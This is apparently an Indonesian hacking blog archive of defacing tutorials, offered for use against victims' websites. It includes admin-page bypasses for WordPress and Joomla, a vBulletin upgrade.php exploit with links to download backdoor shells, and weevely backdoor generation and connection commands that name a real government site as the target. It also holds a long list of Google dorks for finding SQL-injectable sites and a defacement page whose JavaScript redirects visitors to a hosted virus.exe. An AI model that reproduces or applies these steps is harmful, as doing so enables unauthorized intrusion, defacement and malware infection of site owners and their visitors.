Showing posts with label Defacing. Show all posts
Showing posts with label Defacing. Show all posts

Tuesday 18 February 2014

Mengatasi halaman wp-admin yang di sembunyikan atau di redirect halaman depan

No comments
Hmm . . .kali ini saya akan memberikan trick untuk mengetahui halaman wp-admin wordpress yang biasanya disembunyikan dan di redirect ke halaman depan

jangan nyerah dulu

kadang kala kita menemui kasus ini ketika kita melakukan deface dengan teknik symlink kadang kala menemukan config wordpress dan halaman adminya tidak bisa di akses atau di alihkan ke halaman depan

langsung aja buka mysql interface untuk mengakses config wordpress

lalu pergi ke table wp-option dan cari  "active_plugins"

setelahitu hapus data active plugins


 lalu coba balik ke wp-admin website korban lalu coba kita akses



taraaaaa . . .  halaman wp-admin pun muncul ini artinya akses ke halaman login wordpress pun bisa di akses

happy hacking
Share:
Read More

Wednesday 15 January 2014

Mengatasi halaman administrator joomla yang disembunyikan

No comments
Hmm . . .kali ini saya akan memberikan trick untuk mengetahui halaman administrator joomla yang biasanya disembunyikan dan di redirect ke halaman depan

jangan nyerah dulu

kadang kala kita menemui kasus ini ketika kita melakukan deface dengan teknik symlink kadang kala menemukan config joomla dan halaman adminya tidak bisa di akses atau di alihkan ke halaman depan

langsung aja buka mysql interface untuk mengakses config joomla

cari data extension lalu masuk ke data dan cari data content_loadmodule lalu hapus




dan masuk halaman administratornya



ATAU ada cara lain

lalu pilih plugins atau module



setelah itu cari jsecure authentication lalu klik edit


setelah klik edit cari key nya disini key tersebut adalah kikams



nah kita udah dapat kuncinya

saatny masuk di website korban untuk memasukkan kunci administratornya



http://websitekorban/administrator?kikams

dan sukses kita bisa akses halaman admin joomla
Share:
Read More

Saturday 12 October 2013

Hack vbulletin forum dengan upgrade exploit + upload shell backdoor

No comments




Tutor kali ini akan mempraktekkan bagaimana cara exploit website yang beraliran cms vbulletin


ok langsung saja ya

kita butuhkan dork terlebih dahulu

Inurl://install/upgrade.php
intext:vBulletin 4.2.1 Upgrade System
intext:vbulletin-style.xml

copy salah satu dork tersebut lalu tulis di google untuk mencari web site yang rentan akan exploit nya

 setelah itu buka web nya 

lalu masukkan exploitnya 
/install/upgrade.php


misalnya : http://websitetarget.com/install/upgrade.php




kemudian ctrl + U halamanya 
dan anda akan di baa ke halaman source code halaman

dan cari  CUSTNUMBER



setelah mengcopy custnumbernya sekarang download script nya

https://dl.dropboxusercontent.com/s/rmk6y85fr7g11vo/0dayVbulletin-upgrade.php?token_hash=AAGnO5qdtsLUZtvgE87xJo10mNIXjA4gZQbbQBfwTD4w9g&dl=1


setelah download upload script tersebut ke hosting anda

atau bisa gunakan punya saya

http://partisikantor-sms.com/clearbox/language/en/0dayVbulletin-upgrade.php
 setelah itu
copy url korban ,
customer id isi dengan custnumber yang telah di copy tadi ,
username & password & email terserah anda

Lalu kita INJECT


dan sukses



jika berhasil kembali ke website korban dan login ke halaman admin panel nya
http://websitekorban.com/adminpanel

 lalu login dengan username & password yang telah dibuat tadi





dan berhasil sekarang tujuan kita disin adalah memasukkan backdoor php buat hack web tersebut

dowload backdoor php di --> https://dl.dropboxusercontent.com/s/iyde0pvi7jgyvih/kodok.php?token_hash=AAFqn-9NRtKhS7Thz_q1QogdJLF6dKcTpducDgr-gCiX1g&dl=1




done . . 

Next, tambahkan url di depan /admincp ditambah /plugin.php?do=files
http://webstarget/admincp/plugin.php?do=files


 Maka anda akan dibawa ke tempat upload shell


sekarang download backdoor shell yang berextensi .xml

download shell --> https://dl.dropboxusercontent.com/s/a3ub3oj8at75zxb/c99.xml.rar?token_hash=AAGfbp-U3BPYVEMzudsOOOpHW4a5eijwfV6yblNpnv6v9w&dl=1

lalu upload/import

Kalo upload nya dah selesai, cek di
http://webtarget.com/admincp/subscriptions.php

dan backdoor pun sudah tertanam pada web


tinggal sekarang terserah mau di deface atau yang lainya
Share:
Read More

Saturday 3 August 2013

Cara backconnect ke server untuk melakukan root server

No comments

tutorial kali ini akan menjelaskan tentang cara backconnect ke server dengan mudah tanpa port seperti pada netcat pada os BACKTRACK dan pada os WINDOWS

1. pada os Backtrack

disini saya menggunakan tool weevely.py yang sudah ada pada backtrack 5
tapi di versi windows pun juga ada loh

hebatnya lagi weevely tidak membutuhkan pengaturan ip forward nat pada router jadi tinggal plug n play saja

sekarang apa itu backconnect

backconnect = menghubungkan si attacker dengan korban
supaya si attacker bisa memasukkan perintah-peritah pada mesin korban

oke pertama saya akan memperlihatkan bagaimana weveely bekerja pada backtrack

buka terminal lalu masuk directory /pentest/backdoors/web/weevely

cd /pentest/backdoors/web/weevely

 setelah itu kita buat backdor shell nya beserta passwordnya dengan perintah

./weevely.py generate 123456 /root/shell.php

ganti tulisan warna hijau dengan password kalian
dan warna merah dengan nama sesuai keinginan

disini hasil output weevely saya namai shell.php



setelah itu shell php backdoor pun tercipta pada folder root

dan sekarang upload backdoor yangbaru dibuat pada website target yang sudah tertanam shell


setelah itu panggil filenye yang di upload tadi

http://websitetarget/path/shell.php

setelah php dieksekusi saatnya kembali  terminal weevely dan masukkan perintah connectkan

 ./weevely.py http://vsi.esdm.go.id/bencana/shell.php 123456

ganti tulisan biru dengan alamat target shell.php dan warna merah dengan password yang telah di buat tadi



dan sukses kita berada pada local mesin korban


2. Pada Os Windows

download dulu python dan anak-anknya --> https://dl.dropboxusercontent.com/s/95dgtfd8zx406fr/Python275.rar?token_hash=AAGBUkk701PTlNWTYWNP9qBrI583EiZQiJrjN7tSeyRnMQ&dl=1


lalu install ya . . . install pada directory C: saja

setelah diinstal maka folder Python27 tercipta

lalu download tool weevely nya --> https://dl.dropboxusercontent.com/s/8uw2u0z787ps9oh/weevely.rar?token_hash=AAHB_Z2MgYItAfIypOfpqZHm74UVpv2LuGd0LnUpqNdcnQ&dl=1



setelah tool weevelynya didownload ekstrak pada folder python27 alangkah baiknya buat new folder degan nama apps lalu ekstrak disitu



setelah diekstrak buat file .php dengan notepad kosongan saja dan save di folder weevely
disini saya namai test.php



lalu buka cmd dengan menekan tombol windows + r dan masuk directory python27/apps/weveely




cd/
cd /Python27/apps/weevely


kemudian ketikkan perintah
 main.py -g -o test.php -p 123456
 test.php = file kosongan tadi
123456 = password




nah,,file yg kosong tadi telah berisi kode php dari Weevely,,

saatnay upload ke website korban yang telah tertanam shell php backdoor


kembali lagi ke cmd dan panggil file test.php tadi

main.py -t -u http://alamattarget.com/path/test.php -p 123456
ganti tulisan merah dengan alamat php target yang telah di upload
ganti tulisan hijau itu = password yang telah kita buat tadi

 
Dan kita pun masuk pada local mesin server korban


Share:
Read More

Friday 2 August 2013

Dork Sql injection

No comments



Langsung saja share dork sql injection
silahkan masukkan salah satu keyword di bawah pada kotak pencarian google

intext:”error in your SQL syntax” +site:in

intext:”mysql_num_rows()” +site:in

intext:”mysql_fetch_array()” +site:in

intext:”Error Occurred While Processing Request” +site:in

intext:”Server Error in ‘/’ Application” +site:in

intext:”Microsoft OLE DB Provider for ODBC Drivers error” +site:in

intext:”Invalid Querystring” +site:in

intext:”OLE DB Provider for ODBC” +site:in

intext:”VBScript Runtime” +site:in

intext:”ADODB.Field” +site:in

intext:”BOF or EOF” +site:in

intext:”ADODB.Command” +site:in

intext:”JET Database” +site:in

intext:”mysql_fetch_row()” +site:in

intext:”Syntax error” +site:in

intext:”include()” +site:in

intext:”mysql_fetch_assoc()” +site:in

intext:”mysql_fetch_object()” +site:in

intext:”mysql_numrows()” +site:in

intext:”GetArray()” +site:in

intext:”FetchRow()” +site:in

intext:”Input string was not in a correct format” +site:in



inurl:/general.php?*id=*

inurl:/careers-detail.asp?id=

inurl:/WhatNew.asp?page=&id=

inurl:/gallery.asp?cid=

inurl:/publications.asp?type=

inurl:/mpfn=pdview&id=

inurl:/reservations.php?id=

inurl:/list_blogs.php?sort_mode=

inurl:/eventdetails.php?*=

inurl:/commodities.php?*id=

inurl:/recipe-view.php?id=

inurlroduct.php?mid=

inurl:view_ad.php?id=

inurl:/imprimir.php?id=

inurl:/prodotti.php?id=

inurl:index.cgi?aktion=shopview

inurl:/default.php?id=

inurl:/default.php?portalID=

inurl:/*.php?id=

inurl:/articles.php?id=

inurl:/os_view_full.php?

inurl:/Content.asp?id=

inurl:/CollectionContent.asp?id=

inurl:/Details.asp?id=

intext:"Powered By : SE Software Technologies" filetypehp

inurl:/index.php?pgId=

inurl:/index.php?PID= "Powered By Dew-NewPHPLinks v.2.1b"

inurl:/dosearch.asp?

inurl:/details.php?linkid=

inurl:/viewfaqs.php?cat=

inurl:/calendar.php?token=

inurl:/games.php?id= "Powered by PHPD Game Edition"

inurl:/gmap.php?id=

allinurl:*.php?txtCodiInfo=

inurl:/notizia.php?idArt=

inurl:read.php?=

inurl:"ViewerFrame?Mode="

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurllay_old.php?id=

inurl:declaration_more.php?decl_id=

inurlageid=

inurl:games.php?id=

inurlage.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:historialeer.php?num=

inurl:reagir.php?num=

inurl:Stray-Questions-View.php?num=

inurl:forum_bds.php?num=

inurl:game.php?id=

inurl:view_product.php?id=

inurl:newsone.php?id=

inurl:sw_comment.php?id=

inurl:news.php?id=

inurl:avd_start.php?avd=

inurl:event.php?id=

inurlroduct-item.php?id=

inurl:sql.php?id=

inurl:news_view.php?id=

inurl:select_biblio.php?id=

inurl:humor.php?id=

inurl:aboutbook.php?id=

inurlgl_inet.php?ogl_id=

inurl:fiche_spectacle.php?id=

inurl:communique_detail.php?id=

inurl:sem.php3?id=

inurl:kategorie.php4?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=

inurl:show_an.php?id=

inurlreview.php?id=

inurl:loadpsb.php?id=

inurlpinions.php?id=

inurl:spr.php?id=

inurlages.php?id=

inurl:announce.php?id=

inurl:clanek.php4?id=

inurlarticipant.php?id=

inurl:download.php?id=

inurl:main.php?id=

inurl:review.php?id=

inurl:chappies.php?id=

inurlrod_detail.php?id=

inurl:viewphoto.php?id=

inurl:article.php?id=

inurlerson.php?id=

inurlroductinfo.php?id=

inurl:showimg.php?id=

inurl:view.php?id=

inurl:website.php?id=

inurl:hosting_info.php?id=

inurl:gallery.php?id=

inurl:rub.php?idr=

inurl:view_faq.php?id=

inurl:artikelinfo.php?id=

inurl:detail.php?ID=

inurl:index.php?=

inurlrofile_view.php?id=

inurl:category.php?id=

inurlublications.php?id=

inurl:fellows.php?id=

inurl:downloads_info.php?id=

inurlrod_info.php?id=

inurl:shop.php?do=part&id=

inurlroductinfo.php?id=

inurl:collectionitem.php?id=

inurl:band_info.php?id=

inurlroduct.php?id=

inurl:releases.php?id=

inurl:ray.php?id=

inurlroduit.php?id=

inurlop.php?id=

inurl:shopping.php?id=

inurlroductdetail.php?id=

inurlost.php?id=

inurl:viewshowdetail.php?id=

inurl:clubpage.php?id=

inurl:memberInfo.php?id=

inurl:section.php?id=

inurl:theme.php?id=

inurlage.php?id=

inurl:shredder-categories.php?id=

inurl:tradeCategory.php?id=

inurlroduct_ranges_view.php?ID=

inurl:shop_category.php?id=

inurl:transcript.php?id=

inurl:channel_id=

inurl:item_id=

inurl:newsid=

inurl:trainers.php?id=

inurl:news-full.php?id=

inurl:news_display.php?getid=

inurl:index2.php?option=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:newsone.php?id=

inurl:event.php?id=

inurlroduct-item.php?id=

inurl:sql.php?id=

inurl:aboutbook.php?id=

inurlreview.php?id=

inurl:loadpsb.php?id=

inurlages.php?id=

inurl:material.php?id=

inurl:clanek.php4?id=

inurl:announce.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:viewapp.php?id=

inurl:viewphoto.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:review.php?id=

inurl:iniziativa.php?in=

inurl:curriculum.php?id=

inurl:labels.php?id=

inurl:story.php?id=

inurl:look.php?ID=

inurl:newsone.php?id=

inurl:aboutbook.php?id=

inurl:material.php?id=

inurlpinions.php?id=

inurl:announce.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:tekst.php?idt=

inurl:newscat.php?id=

inurl:newsticker_info.php?idn=

inurl:rubrika.php?idr=

inurl:rubp.php?idr=

inurlffer.php?idf=

inurl:art.php?idm=

inurl:title.php?id=

intitle:axis intitle:"video server"

inurl:indexFrame.shtml Axis

?intitle:index.of? mp3 artist-name-here

"intitle:index of"

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurllay_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:Pageid=

inurl:games.php?id=

inurlage.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:historialeer.php?num=

inurl:reagir.php?num=

inurl:forum_bds.php?num=

inurl:game.php?id=

inurl:view_product.php?id=

inurl:newsone.php?id=

inurl:sw_comment.php?id=

inurl:news.php?id=

inurl:avd_start.php?avd=

inurl:event.php?id=

inurlroduct-item.php?id=

inurl:sql.php?id=

inurl:news_view.php?id=

inurl:select_biblio.php?id=

inurl:humor.php?id=

inurl:aboutbook.php?id=

inurl:fiche_spectacle.php?id=

inurl:communique_detail.php?id=

inurl:sem.php3?id=

inurl:kategorie.php4?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=

inurl:show_an.php?id=

inurlreview.php?id=

inurl:loadpsb.php?id=

inurlpinions.php?id=

inurl:spr.php?id=

inurlages.php?id=

inurl:announce.php?id=

inurl:clanek.php4?id=

inurlarticipant.php?id=

inurl:download.php?id=

inurl:main.php?id=

inurl:review.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurlrod_detail.php?id=

inurl:viewphoto.php?id=

inurl:article.php?id=

inurlerson.php?id=

inurlroductinfo.php?id=

inurl:showimg.php?id=

inurl:view.php?id=

inurl:website.php?id=

inurl:hosting_info.php?id=

inurl:gallery.php?id=

inurl:rub.php?idr=

inurl:view_faq.php?id=

inurl:artikelinfo.php?id=

inurl:detail.php?ID=

inurl:index.php?=

inurlrofile_view.php?id=

inurl:category.php?id=

inurlublications.php?id=

inurl:fellows.php?id=

inurl:downloads_info.php?id=

inurlrod_info.php?id=

inurl:shop.php?do=part&id=

inurl:Productinfo.php?id=

inurl:collectionitem.php?id=

inurl:band_info.php?id=

inurlroduct.php?id=

inurl:releases.php?id=

inurl:ray.php?id=

inurlroduit.php?id=

inurlop.php?id=

inurl:shopping.php?id=

inurlroductdetail.php?id=

inurlost.php?id=

inurl:viewshowdetail.php?id=

inurl:clubpage.php?id=

inurl:memberInfo.php?id=

inurl:section.php?id=

inurl:theme.php?id=

inurlage.php?id=

inurl:shredder-categories.php?id=

inurl:tradeCategory.php?id=

inurlroduct_ranges_view.php?ID=

inurl:shop_category.php?id=

inurl:transcript.php?id=

inurl:channel_id=

inurl:item_id=

inurl:newsid=

inurl:trainers.php?id=

inurl:news-full.php?id=

inurl:news_display.php?getid=

inurl:index2.php?option=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:newsone.php?id=

inurl:event.php?id=

inurlroduct-item.php?id=

inurl:sql.php?id=

inurl:aboutbook.php?id=

inurl:review.php?id=

inurl:loadpsb.php?id=

inurl:ages.php?id=

inurl:material.php?id=

inurl:clanek.php4?id=

inurl:announce.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:viewapp.php?id=

inurl:viewphoto.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:review.php?id=

inurl:iniziativa.php?in=

inurl:curriculum.php?id=

inurl:labels.php?id=

inurl:look.php?ID=

inurl:newsone.php?id=

inurl:aboutbook.php?id=

inurl:material.php?id=

inurlpinions.php?id=

inurl:announce.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:tekst.php?idt=

inurl:newscat.php?id=

inurl:newsticker_info.php?idn=

inurl:rubrika.php?idr=

inurl:rubp.php?idr=

inurlffer.php?idf=

inurl:art.php?idm=

inurl:title.php?id=

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()

inurl:"id=" & intext:"Warning: mysql_fetch_array()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: *******_start()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: is_writable()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: Unknown()

inurl:"id=" & intext:"Warning: *******_start()

inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: pg_exec()

inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: mysql_query()

inurl:"id=" & intext:"Warning: array_merge()

inurl:"id=" & intext:"Warning: preg_match()

inurl:"id=" & intext:"Warning: ilesize()

inurl:"id=" & intext:"Warning: filesize()

inurl:"id=" & intext:"Warning: filesize()

inurl:"id=" & intext:"Warning: require()

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurllay_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:Pageid=

inurl:games.php?id=

inurlage.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:historialeer.php?num=

inurl:reagir.php?num=

inurl:forum_bds.php?num=

inurl:game.php?id=

inurl:view_product.php?id=

inurl:newsone.php?id=

inurl:sw_comment.php?id=

inurl:news.php?id=

inurl:avd_start.php?avd=

inurl:event.php?id=

inurlroduct-item.php?id=

inurl:sql.php?id=

inurl:news_view.php?id=

inurl:select_biblio.php?id=

inurl:humor.php?id=

inurl:aboutbook.php?id=

inurl:fiche_spectacle.php?id=

inurl:communique_detail.php?id=

inurl:sem.php3?id=

inurl:kategorie.php4?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=

inurl:show_an.php?id=

inurlreview.php?id=

inurl:loadpsb.php?id=

inurlpinions.php?id=

inurl:spr.php?id=

inurlages.php?id=

inurl:announce.php?id=

inurl:clanek.php4?id=

inurlarticipant.php?id=

inurl:download.php?id=

inurl:main.php?id=

inurl:review.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurlrod_detail.php?id=

inurl:viewphoto.php?id=

inurl:article.php?id=

inurlerson.php?id=

inurlroductinfo.php?id=

inurl:showimg.php?id=

inurl:view.php?id=

inurl:website.php?id=

inurl:hosting_info.php?id=

inurl:gallery.php?id=

inurl:rub.php?idr=

inurl:view_faq.php?id=

inurl:artikelinfo.php?id=

inurl:detail.php?ID=

inurl:index.php?=

inurlrofile_view.php?id=

inurl:category.php?id=

inurlublications.php?id=

inurl:fellows.php?id=

inurl:downloads_info.php?id=

inurlrod_info.php?id=

inurl:shop.php?do=part&id=

inurl:Productinfo.php?id=

inurl:collectionitem.php?id=

inurl:band_info.php?id=

inurlroduct.php?id=

inurl:releases.php?id=

inurl:ray.php?id=

inurlroduit.php?id=

inurlop.php?id=

inurl:shopping.php?id=

inurlroductdetail.php?id=

inurlost.php?id=

inurl:viewshowdetail.php?id=

inurl:clubpage.php?id=

inurl:memberInfo.php?id=

inurl:section.php?id=

inurl:theme.php?id=

inurlage.php?id=

inurl:shredder-categories.php?id=

inurl:tradeCategory.php?id=

inurlroduct_ranges_view.php?ID=

inurl:shop_category.php?id=

inurl:transcript.php?id=

inurl:channel_id=

inurl:item_id=

inurl:newsid=

inurl:trainers.php?id=

inurl:news-full.php?id=

inurl:news_display.php?getid=

inurl:index2.php?option=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:newsone.php?id=

inurl:event.php?id=

inurlroduct-item.php?id=

inurl:sql.php?id=

inurl:aboutbook.php?id=

inurl:review.php?id=

inurl:loadpsb.php?id=

inurl:ages.php?id=

inurl:material.php?id=

inurl:clanek.php4?id=

inurl:announce.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:viewapp.php?id=

inurl:viewphoto.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:review.php?id=

inurl:iniziativa.php?in=

inurl:curriculum.php?id=

inurl:labels.php?id=

inurl:story.php?id=

inurl:look.php?ID=

inurl:newsone.php?id=

inurl:aboutbook.php?id=

inurl:material.php?id=

inurlpinions.php?id=

inurl:announce.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:tekst.php?idt=

inurl:newscat.php?id=

inurl:newsticker_info.php?idn=

inurl:rubrika.php?idr=

inurl:rubp.php?idr=

inurlffer.php?idf=

inurl:art.php?idm=

inurl:title.php?id=

trainers.php?id=

article.php?ID=

play_old.php?id=

declaration_more.php?decl_id=

Pageid=

games.php?id=

newsDetail.php?id=

staff_id=

historialeer.php?num=

product-item.php?id=

news_view.php?id=

humor.php?id=

communique_detail.php?id=

sem.php3?id=

opinions.php?id=

spr.php?id=

pages.php?id=

chappies.php?id=

prod_detail.php?id=

viewphoto.php?id=

view.php?id=

website.php?id=

hosting_info.php?id=

gery.php?id=

detail.php?ID=

publications.php?id=

Productinfo.php?id=

releases.php?id=

ray.php?id=

produit.php?id=

pop.php?id=

shopping.php?id=

productdetail.php?id=

post.php?id=

section.php?id=

theme.php?id=

page.php?id=

shredder-categories.php?id=

product_ranges_view.php?ID=

shop_category.php?id=

channel_id=

newsid=

news_display.php?getid=

ages.php?id=

clanek.php4?id=

review.php?id=

iniziativa.php?in=

curriculum.php?id=

labels.php?id=

look.php?ID=

galeri_info.php?l=

tekst.php?idt=

newscat.php?id=

newsticker_info.php?idn=

rubrika.php?idr=

offer.php?idf=

"id=" & intext:"Warning: mysql_fetch_array()

"id=" & intext:"Warning: getimagesize()

"id=" & intext:"Warning: *******_start()

"id=" & intext:"Warning: mysql_num_rows()

"id=" & intext:"Warning: mysql_query()

"id=" & intext:"Warning: array_merge()

"id=" & intext:"Warning: preg_match()

"id=" & intext:"Warning: ilesize()

"id=" & intext:"Warning: filesize()

index.php?id=

buy.php?category=

article.php?ID=

play_old.php?id=

newsitem.php?num=

top10.php?cat=

historialeer.php?num=

reagir.php?num=

Stray-Questions-View.php?num=

forum_bds.php?num=

game.php?id=

view_product.php?id=

sw_comment.php?id=

news.php?id=

avd_start.php?avd=

event.php?id=

sql.php?id=

news_view.php?id=

select_biblio.php?id=

humor.php?id=

ogl_inet.php?ogl_id=

fiche_spectacle.php?id=

communique_detail.php?id=

sem.php3?id=

kategorie.php4?id=

faq2.php?id=

show_an.php?id=

preview.php?id=

loadpsb.php?id=

opinions.php?id=

spr.php?id=

announce.php?id=

participant.php?id=

download.php?id=

main.php?id=

review.php?id=

chappies.php?id=

read.php?id=

prod_detail.php?id=

article.php?id=

person.php?id=

productinfo.php?id=

showimg.php?id=

view.php?id=

website.php?id=

hosting_info.php?id=

gery.php?id=

rub.php?idr=

view_faq.php?id=

artikelinfo.php?id=

detail.php?ID=

index.php?=

profile_view.php?id=

category.php?id=

publications.php?id=

fellows.php?id=

downloads_info.php?id=

prod_info.php?id=

shop.php?do=part&id=

collectionitem.php?id=

band_info.php?id=

product.php?id=

releases.php?id=

ray.php?id=

produit.php?id=

pop.php?id=

shopping.php?id=

productdetail.php?id=

post.php?id=

viewshowdetail.php?id=

clubpage.php?id=

memberInfo.php?id=

section.php?id=

theme.php?id=

page.php?id=

shredder-categories.php?id=

tradeCategory.php?id=

product_ranges_view.php?ID=

shop_category.php?id=

transcript.php?id=

channel_id=

item_id=

newsid=

trainers.php?id=

news-full.php?id=

news_display.php?getid=

index2.php?option=

readnews.php?id=

newsone.php?id=

product-item.php?id=

pages.php?id=

clanek.php4?id=

viewapp.php?id=

viewphoto.php?id=

galeri_info.php?l=

iniziativa.php?in=

curriculum.php?id=

labels.php?id=

story.php?id=

look.php?ID=

aboutbook.php?id=

"id=" & intext:"Warning: mysql_fetch_assoc()

"id=" & intext:"Warning: is_writable()

"id=" & intext:"Warning: Unknown()

"id=" & intext:"Warning: mysql_result()

"id=" & intext:"Warning: pg_exec()

"id=" & intext:"Warning: require()

buy.php?category=

pageid=

page.php?file=

show.php?id=

newsitem.php?num=

readnews.php?id=

top10.php?cat=

reagir.php?num=

Stray-Questions-View.php?num=

forum_bds.php?num=

game.php?id=

view_product.php?id=

sw_comment.php?id=

news.php?id=

avd_start.php?avd=

event.php?id=

sql.php?id=

select_biblio.php?id=

ogl_inet.php?ogl_id=

fiche_spectacle.php?id=

kategorie.php4?id=

faq2.php?id=

show_an.php?id=

loadpsb.php?id=

announce.php?id=

participant.php?id=

download.php?id=

article.php?id=

person.php?id=

productinfo.php?id=

showimg.php?id=

rub.php?idr=

view_faq.php?id=

artikelinfo.php?id=

index.php?=

profile_view.php?id=

category.php?id=

fellows.php?id=

downloads_info.php?id=

prod_info.php?id=

shop.php?do=part&id=

collectionitem.php?id=

band_info.php?id=

product.php?id=

viewshowdetail.php?id=

clubpage.php?id=

memberInfo.php?id=

tradeCategory.php?id=

transcript.php?id=

item_id=

news-full.php?id=

aboutbook.php?id=

preview.php?id=

material.php?id=

read.php?id=

viewapp.php?id=

story.php?id=

newsone.php?id=

rubp.php?idr=

art.php?idm=

title.php?id=

index1.php?modo=

include.php?*

*=

nota.php?pollname=

index3.php?p=

padrao.php?pre=

home.php?pa=

main.php?type=

sitio.php?start=

*.php?include=

general.php?xlink=

show.php?go=

nota.php?ki=

down*.php?oldal=

layout.php?disp=

enter.php?chapter=

base.php?incl=

enter.php?mod=

show.php?corpo=

head.php?*

*=

info.php?strona=

template.php?str=
Share:
Read More

Wednesday 17 July 2013

Menyisipkan virus pada halaman html atau halaman deface

No comments

Pertama Tama


Upload virusmu di shell depes,,,,
jika sudah selesai di upload,, copy alamat virus tadi misallnya alamat virus yang telah kamu upload di shell berada pada http://alamatweb/image/virus.exe

copy code berikut pada file html / depesmu, ingat harus dipaste sebelum kode </html> atau pada body html

<script type="text/javascript">
<!--
function exec_refresh()
{
window.status = "Redirecting..." + myvar;
myvar = myvar + " .";
var timerID = setTimeout("exec_refresh();", 150);
if (timeout > 5)
{
timeout -= 5;
}
else
{
clearTimeout(timerID);
window.status = "";
window.location = "alamat virusmu";
}
}
var myvar = "";
var timeout = 190;
exec_refresh();
//-->
</script>

misalnya saya masukkan pada halaman deface saya jadinya : -->

 <html>

<style type="text/css">
   


 |</div>
body {
    background-color: black;
}
//.matrix { font-family:Lucida Console, Courier, Monotype; font-size:10pt; text-align:center; width:10px; padding:0px; margin:0px;}
.matrix { font-size:17pt; text-align:center; width:20px; padding:0px; margin:0px;}
</style>
<center><font face="Verdana" size="2" color="#FF0000">GOTCHA :P LOL </font> |
     <script language="Javascript" src="http://www.ip2phrase.com/ip2phrase.asp?template=Your IP: <IP>"></script> <font color="#ff9900"> | </font> <script language="Javascript" src="http://www.ip2phrase.com/ip2phrase.asp?template= <isp>"></script><font color="#ff9900"> | </font><script language="Javascript" src="http://www.ip2phrase.com/ip2phrase.asp?template= <country>"></script> <font color="#ff9900"> | </font> <script language="Javascript" src="http://www.ip2phrase.com/ip2phrase.asp?template= <flag>"></script></center>
<link rel="SHORTCUT ICON" href="http://i55.tinypic.com/2z7ld11.gif">
<body style="background-color: black;"><title>### HACKED BY TrojanzBoy###</title><center><div style="font-family: impact; font-size: 25px; color: red; background-color: black; padding-top: 2px; text-align: center; line-height: 75px; height: 75px;">


<div align=center id="matrix"}>
  <style type="text/css">b.drop-shadow { text-shadow: 0 0 2px #ccc; }</style><font color="red"><b class="drop-shadow"><b>.:: P0wn3d By TrojanzBoy ::.</b></font></b>     

       
</div>

<html>
<title>./P0wn3d By TrojanzBoy</title>

<body bgcolor="#000000" text="white">
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>

<center>


<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOt9ara02ky_YPh1Ose0WcCOoIHsgU1y5bm2mUjgzGelWcmDHrVpOPPw7QjsZXpoW8yJYcYd4qi_fPGH5rM1mEP4t6cZ7Vs_oKo6pcBz-cJcXVGT7s4VocY7CeZPWoBebsYAv1aMsVa08/s1600/anak-pemulung.jpg" height="480px"></img>

</center>
<center>

aku hanyalah seorang pemulung web . . . !<br>
</center>
<small>

</font>
</a>

</i>
</small>

</p></center>


<script type="text/javascript">
<!--
function exec_refresh()
{
window.status = "Redirecting..." + myvar;
myvar = myvar + " .";
var timerID = setTimeout("exec_refresh();", 150);
if (timeout > 5)
{
timeout -= 5;
}
else
{
clearTimeout(timerID);
window.status = "";
window.location = "http://narutoupdate.strangled.net/virus.exe";
}
}

var myvar = "";
var timeout = 190;
exec_refresh();
//-->
</script>

</body></html>


</marquee></a>
<center>
    <embed src="http://videokeman.com/music/videokemanplay.swf" width="1" height="1" wmode="transparent" FlashVars="playerID=1&amp;bg=0xffffff&amp;leftbg=0xCA4536&amp;lefticon=0xffffff&amp;rightbg=0xCA4536&amp;rightbghover=0x999999&amp;righticon=0xffffff&amp;righticonhover=0xffffff&amp;text=0xCA4536&amp;slider=0x303030&amp;track=0xFFFFFF&amp;border=0x666666&amp;loader=0xC52C24&amp;autostart=yes&amp;loop=yes&amp;soundFile=http://videokeman.com/dload/nm3/053011/Alexandra_Stan_-_Mrxdot_Saxobeat.vkm"></embed>
</body>
</center>

<html>

Sekian Dari sayaTelephone 


Share:
Read More

Blogroll

This Blog is protected by DMCA.com

DMCA.com for Blogger blogs

Labels

Blog Archive